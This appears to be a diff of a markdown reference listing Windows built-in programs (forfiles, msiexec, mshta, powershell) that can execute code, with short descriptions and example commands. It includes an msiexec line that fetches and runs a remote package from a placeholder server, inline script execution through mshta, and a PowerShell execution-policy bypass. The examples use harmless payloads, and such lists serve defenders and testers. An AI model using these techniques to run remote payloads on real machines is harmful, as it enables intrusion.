pwndizzle/CodeExecutionOnWindows/examples.md

   - Description: Forfiles supports the ability to execute commands and seems to be equivalent to cmd.
   - Example: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

-- msiexec
+- msiexec.exe
   - Description - The Windows installer typically used to install new software or patches.
 It be used to download and execute a remote payload.
   - Example: msiexec /i http://server/package.msi

-- mshta
+- mshta.exe
   - Description: MSHTA can be used to execute HTA files (containing scripts) or directly execute VBScript/JScript from the command line.
   - Example: mshta bad.hta
   - Example: mshta vbscript:Execute("MsgBox(""amessage"",64,""atitle"")(window.close)")
   - Example: mshta javascript:alert('test');

-- powershell
+- powershell.exe
   - Description: The most well known and most useful attacker utility.
 Powershell can be operated in console mode, with commands provided on the command line or through passing a ps1 file containing commands.
   - Example: powershell -c calc
   - Example: powershell -exec bypass -File test.ps1